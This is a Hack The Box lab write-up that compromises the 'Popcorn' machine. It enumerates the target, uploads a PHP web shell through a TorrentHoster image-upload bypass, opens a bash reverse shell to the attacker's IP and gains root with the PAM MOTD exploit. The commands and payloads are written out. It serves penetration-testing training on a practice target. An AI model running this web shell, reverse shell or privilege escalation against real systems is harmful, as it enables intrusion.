Popcorn is relatively easy Linux machine although initial foothold is not very straightforward. You need to dig a bit to find it. Because this machine is running on a pretty old Ubuntu version, there are more then one way to escalate privileges.
First, lets start nmap
┌─[root@parrot]─[/home/luka/Desktop/htb/Popcorn/nmap] └──╼ #nmap -sC -sT -oA nmap -n 10.10.10.6 Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-20 20:39 CET Nmap scan report for 10.10.10.6 Host is up (0.052s latency). Not shown: 998 closed ports PORT STATE SERVICE 22/tcp open ssh | ssh-hostkey: | 1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA) |_ 2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA) 80/tcp open http |_http-title: Site doesn't have a title (text/html). Nmap done: 1 IP address (1 host up) scanned in 2.25 seconds
Since on hackthebox simple credentials are not working for SSH and bruteforcing is not the way to go (we don’t even know the username), enumerating the web server seems like only way to go. Directory enumeration from directories will be done with gobuster. (https://github.com/OJ/gobuster)
┌─[✗]─[root@parrot]─[/home/luka/Desktop/htb/Popcorn/nmap] └──╼ #/home/luka/tools/gobuster/gobuster -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -u http://10.10.10.6 ===================================================== Gobuster v2.0.1 OJ Reeves (@TheColonial) [+] Mode : dir [+] Url/Domain : http://10.10.10.6/ [+] Threads : 10 [+] Wordlist : /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt [+] Status codes : 200,204,301,302,307,403 [+] Timeout : 10s 2019/03/20 20:53:10 Starting gobuster /index (Status: 200) /test (Status: 200) /torrent (Status: 301) /rename (Status: 301) 2019/03/20 20:59:31 Finished
Checking the directories found – /test reveals some information about the machine. This is definitely a valuable information
Exploitation / Initial Foothold
The directory /torrent on the other hand seems to be hosting some torrent web portal.
In the footer we can find following information:
Copyright © 2007 TorrentHoster.com. All rights reserved
If we search on google for torrenthoster we will surely find following page: https://packetstormsecurity.com/files/87275/Torrent-Hoster-XSS-Shell-Upload.html . According to this website, this “torrenthoster” has some upload vulnerabilities. All of them require authenticated access though.
As it seems we can create the user – simply sign up and log in with an newly created user.
There is an upload vulnerability
We could try different file types, but they are not going to be uploaded. The application is actually doing some background checks on that file as well. As soon as the file will be uploaded, you will see some metadata about the torrent as well. We do have however another posibility uploading our code under the screenshots.
If Burp (or some comparable alternative program) is not already running, we should start it in order to intercept upload and be able to change the header
To switch proxies in the Firefox browser simple and quickly, i use FoxyProxy extension with following settings:
Of course setting up FoxyProxy is not enough, you also have to make sure that your Burp is set to intercept and FoxyProxy is activated. Intercepting the jpg file first will make crafting the malicious PHP file later easier. We need to copy enough characters (bytes) to make the application believe that we are uploading an jpg. (You can read more about magic bytes here: https://blog.netspi.com/magic-bytes-identifying-common-file-formats-at-a-glance/)
We can send the HTTP Request to repeater, but is also going to be saved in Burp in the Target > Site map
We can now upload our shell simply by pasting php code behind the magic bytes + some random bytes. I used very simple php code “<?php echo system($_REQUEST[‘cmd’]); ?>”. I also changed the file into cmd.jpg.php and content type into image/jpeg. This way we can bypass more than one upload block mechanism.
I ran gobuster again in the http://10.10.10.6/torrent/ to crawl this directory , since we need to find an upload folder to run the script (and check if it was uploaded at all).
┌─[root@parrot]─[/home/luka/Desktop/htb/Popcorn/nmap] └──╼ #/home/luka/tools/gobuster/gobuster -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -u http://10.10.10.6/torrent -x php ===================================================== Gobuster v2.0.1 OJ Reeves (@TheColonial) [+] Mode : dir [+] Url/Domain : http://10.10.10.6/torrent/ [+] Threads : 10 [+] Wordlist : /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt [+] Status codes : 200,204,301,302,307,403 [+] Extensions : php [+] Timeout : 10s 2019/03/20 21:28:15 Starting gobuster /images (Status: 301) /download (Status: 200) /download.php (Status: 200) /index (Status: 200) /index.php (Status: 200) /rss (Status: 200) /rss.php (Status: 200) /login (Status: 200) /login.php (Status: 200) /templates (Status: 301) /users (Status: 301) /admin (Status: 301) /health (Status: 301) /browse (Status: 200) /browse.php (Status: 200) /comment (Status: 200) /comment.php (Status: 200) /upload (Status: 301) /upload.php (Status: 200) /css (Status: 301) /edit (Status: 200) /edit.php (Status: 200) /lib (Status: 301) /database (Status: 301)
We could have found the /upload folder just by guessing as well. Either way, our file was uploaded and it can be run.
Code execution is successful. (see output from the command cmd=whoami). We can also change the Request method to POST to make the requests more readable and easier to modify
Reverse shell command used: bash -i >& /dev/tcp/10.10.14.68/5555 0>&1
Command can be encoded using CTRL+U (if using GET).
To check if attackers machine can be reached, we can run a ping, and start tcpdump with icmp filter
Since ping is reaching the attackers (our) machine, we can try to get a shell now.
We’ve got a shell, we should now upgrade the shell to fully interactive shell with CTRL+Z to background the process, stty raw -echo and typing fg (no output will be shown) and press enter
There are some credentials in /var/www/torrent/config.php. I couldn’t find anything useful in the database, Apart from the hash of the Admin user, which i couldn’t crack.
I couldn’t find anything useful in the database, Apart from the hash of the Admin user, which i couldn’t crack. Connect to database with mysql -u torrent -D torrenthoster -p and type the SuperSecret!! password.
We can read the user flag.
www-data@popcorn:/var/www/torrent$ ls -la /home/george/ total 872 drwxr-xr-x 3 george george 4096 Mar 17 2017 . drwxr-xr-x 3 root root 4096 Mar 17 2017 .. -rw------- 1 root root 2769 May 5 2017 .bash_history -rw-r--r-- 1 george george 220 Mar 17 2017 .bash_logout -rw-r--r-- 1 george george 3180 Mar 17 2017 .bashrc drwxr-xr-x 2 george george 4096 Mar 17 2017 .cache -rw------- 1 root root 1571 Mar 17 2017 .mysql_history -rw------- 1 root root 19 May 5 2017 .nano_history -rw-r--r-- 1 george george 675 Mar 17 2017 .profile -rw-r--r-- 1 george george 0 Mar 17 2017 .sudo_as_admin_successful -rw-r--r-- 1 george george 848727 Mar 17 2017 torrenthoster.zip -rw-r--r-- 1 george george 33 Mar 17 2017 user.txt www-data@popcorn:/var/www/torrent$ cat /home/george/user.txt *deleted*
I ran linenum scripts, but i couldn’t find anything on the first sight apart from the most obvious information – Machine is running a very old Ubuntu version. There is a high possibility that the it is vulnerable to dirtycow exploit (https://dirtycow.ninja/)
www-data@popcorn:/home/george$ uname -a Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686 GNU/Linux www-data@popcorn:/home/george$ cat /etc/lsb-release DISTRIB_ID=Ubuntu DISTRIB_RELEASE=9.10 DISTRIB_CODENAME=karmic DISTRIB_DESCRIPTION="Ubuntu 9.10"
I did however find an exploit simply by checking searchsploit/exploit-db for “ubuntu 9.10”. It has to do with MOTD (Message Of The Day) File Tampering. We can find MOTD in the .cache folder in /home/george/.cache/ so we know it is installed. (https://www.exploit-db.com/exploits/14339)
┌─[luka@parrot]─[~/Desktop/htb/Popcorn] └──╼ $searchsploit ubuntu 9.10 Exploit Title | Path | (/usr/share/exploitdb/) Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampe | exploits/linux/local/14273.sh Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampe | exploits/linux/local/14339.sh ReiserFS (Linux Kernel 2.6.34-rc3 / RedHat / Ubuntu 9 | exploits/linux/local/12130.py Shellcodes: No Result Papers: No Result
We can read the exploit using searchsploit -x 14339 and copy it from the location /usr/share/exploitdb/exploits/linux/local/14339.sh . I transfered the exploit to the Popcorn machine using wget.
If you copied this exploit like i did, you will definitely need to remove line endings with “sed -i ‘s/\r//’ 14339.sh” and make it executable with “chmod +x 14339.sh”
www-data@popcorn:/tmp$ chmod +x 14339.sh www-data@popcorn:/tmp$ sed -i 's/\r//' 14339.sh www-data@popcorn:/tmp$ bash 14339.sh  Ubuntu PAM MOTD local root  SSH key set up  spawn ssh [+] owned: /etc/passwd  spawn ssh [+] owned: /etc/shadow [*] SSH key removed [+] Success! Use password toor to get root Password: root@popcorn:/tmp# id uid=0(root) gid=0(root) groups=0(root) root@popcorn:/tmp# cat /root/root.txt *deleted*
We’ve got an root access and we can read the flag.